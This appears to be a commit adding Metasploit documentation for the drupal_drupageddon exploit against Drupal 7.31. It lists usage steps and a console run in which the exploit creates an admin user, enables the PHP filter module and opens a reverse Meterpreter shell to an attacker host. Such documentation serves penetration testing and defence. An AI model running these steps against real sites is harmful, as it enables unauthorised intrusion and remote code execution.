Land #7322, drupal_drupageddon module docs
This commit is contained in:
commit
030e09c9c6
|
@ -0,0 +1,57 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Drupal 7.31 official [download](https://ftp.drupal.org/files/projects/drupal-7.31.tar.gz)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/multi/http/drupal_drupageddon`
|
||||
4. Do: `set rhost <ip>`
|
||||
5. Do: `run`
|
||||
6. You should get a shell.
|
||||
|
||||
## Scenarios
|
||||
|
||||
This is a run against a Drupal 7.31 linux box.
|
||||
|
||||
```
|
||||
msf > use exploit/multi/http/drupal_drupageddon
|
||||
msf exploit(drupal_drupageddon)
|
||||
msf exploit(drupal_drupageddon) > set rhost 1.1.1.1
|
||||
rhost => 1.1.1.1
|
||||
msf exploit(drupal_drupageddon) > set verbose true
|
||||
verbose => true
|
||||
msf exploit(drupal_drupageddon) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 2.2.2.2:4444
|
||||
[*] Testing page
|
||||
[*] form_build_id: form-a1VaaaEaa0lUvL79wIAfdQEaaJRw8P7a1aWGXElI_Go
|
||||
[*] form_token:
|
||||
[*] password hash: $P\$8zAAApjTciVA2qz7HdAA0UjAAwUft00
|
||||
[*] Creating new user AaCaUlLaPR:AAgeAAAAjA
|
||||
[*] Logging in as AaCaUlLaPR:AAgeAAAAjA
|
||||
[*] cookie: SESS911797186fac11111d08b1111a15db55=aaSfinhC0AAAAbzhAoO3bBaaOerRrvpn3cL0rA77Dhg;
|
||||
[*] Trying to parse enabled modules
|
||||
[*] form_build_id: form-YZljDkG8n5AAaAaAaaaYGLaP8MIfdif5VfwjQMMxdN0
|
||||
[*] form_token: Bj92oAaAaWRwqyAAAySWQpeUI03aA9wfkAozXsk_t_E
|
||||
[*] Enabling the PHP filter module
|
||||
[*] Setting permissions for PHP filter module
|
||||
[*] form_build_id: form-1Z1pAg11amM-1jHALgm1AAAAA1JdwAAA1qXnSTZahPA
|
||||
[*] form_token: kAA1A1AfqK_PvJQi1AAAAAAAAxyGyLvHemBor1q11Z1
|
||||
[*] admin role id: 3
|
||||
[*] Getting tokens from create new article page
|
||||
[*] form_build_id: form-_-leQaaaAAeBXbAaAAaaAAx1IrYSI1qeA2OGf2Ce1vs
|
||||
[*] form_token: Ib1y8aAaaAAAdapA53kUcfWf7msTRHiDUb_CIKzAAAA
|
||||
[*] Calling preview page. Exploit should trigger...
|
||||
[*] Sending stage (33721 bytes) to 1.1.1.1
|
||||
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:45388) at 2016-08-25 11:30:41 -0400
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : drupal
|
||||
OS : Linux drupal 2.6.32-642.3.1.el6.x86_64 #1 SMP Sun Jun 26 18:16:44 EDT 2016 x86_64
|
||||
Meterpreter : php/linux
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: apache (48)
|
||||
```
|
Loading…
Reference in New Issue